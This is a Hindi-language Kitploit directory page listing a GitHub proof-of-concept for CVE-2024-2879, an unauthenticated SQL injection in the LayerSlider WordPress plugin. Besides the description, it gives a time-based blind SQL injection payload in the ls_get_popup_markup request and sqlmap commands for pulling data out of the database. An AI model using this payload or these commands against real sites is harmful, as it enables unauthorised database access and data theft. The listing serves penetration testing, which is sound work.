Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2879 — सीवीई-2024-2879 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: लेयरस्लाइडर वर्डप्रेस प्लगइन (7.9.11-7.10.0) में बिना प्रमाणीकरण के SQL इंजेक्शन। इसमें डेटाबेस जानकारी निकालने के लिए स्कैनर स्क्रिप्ट और SQLMap शोषण मार्गदर्शिका शामिल है। | Kitploit
उपकरण/GitHubGitHub/herculeszxc/cve-2024-2879
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubherculeszxc/cve-2024-2879

CVE-2024-2879

सीवीई-2024-2879 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: लेयरस्लाइडर वर्डप्रेस प्लगइन (7.9.11-7.10.0) में बिना प्रमाणीकरण के SQL इंजेक्शन। इसमें डेटाबेस जानकारी निकालने के लिए स्कैनर स्क्रिप्ट और SQLMap शोषण मार्गदर्शिका शामिल है।

रिपॉजिटरी देखें
22312 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2879

विवरण

LayerSlider 7.9.11 - 7.10.0 - अप्रमाणित SQL इंजेक्शन

वर्डप्रेस के लिए LayerSlider प्लगइन, संस्करण 7.9.11 और 7.10.0 में, ls_get_popup_markup कार्रवाई के माध्यम से SQL इंजेक्शन के लिए संवेदनशील है, जो उपयोगकर्ता द्वारा प्रदान किए गए पैरामीटर पर अपर्याप्त एस्केपिंग और मौजूदा SQL क्वेरी पर पर्याप्त तैयारी की कमी के कारण होता है। इससे अप्रमाणित हमलावरों के लिए मौजूदा क्वेरी में अतिरिक्त SQL क्वेरी जोड़ना संभव हो जाता है, जिनका उपयोग डेटाबेस से संवेदनशील जानकारी निकालने के लिए किया जा सकता है।

स्कैनर उपयोग

  1. आवश्यकताएँ स्थापित करें: pip install -r requirements.txt
  2. python3 scan.py या <urllist.txt> image

यदि वेबसाइट WAF से सुरक्षित नहीं है तो मैन्युअल जाँच

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq" 5 सेकंड विलंब प्रतिक्रिया समय image

SQL Map शोषण

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T या sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T

टूल डाउनलोड करें